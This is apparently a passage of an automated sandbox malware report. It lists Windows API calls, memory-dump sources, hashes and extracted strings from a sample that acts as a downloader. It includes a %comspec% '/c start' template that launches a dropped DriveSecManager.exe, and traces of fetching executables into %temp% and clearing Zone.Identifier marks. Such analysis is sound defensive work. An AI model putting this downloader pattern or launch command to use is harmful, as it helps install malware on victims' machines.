                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                                                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                                                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                                                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                                                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                                                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                                                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                    • String ID: Bz@
                                                                                                                                                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                                                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1987401769-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapsProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1420622215-0
                                                                                                                                                                                                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                                                                                    • Instruction ID: 8d4b3b75e0ca4951d81b7fee5ffefe8b4dae6978097e516d12ce04c36a2bdc79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B01ECB4904219CADB248F14D9847A9B778AB44304F1081E6D709B7282C2B85ECACF5E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                                                                                                                                                                                                    • Instruction ID: ad55d0a0fc81490cd0e7a8c39e77b8496904da2014b800c37f86947748ff7242
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA128CB4D002199FCB08CF99D991AEEFBB2BF88304F24856AE415BB345D334AA15CF54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                                                                                    • Instruction ID: 054a0bb403a3dad9bf0ef84f7a0700921875b898f10d87bbce24b5acd7998093
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4721B872900205AFC710EF79C880967FBA5FF45310B45857EE9559B286E734F925C7E0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                                                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
                                                                                                                                                                                                                                                    • API String ID: 3709769524-481826255
                                                                                                                                                                                                                                                    • Opcode ID: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                                                                                                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
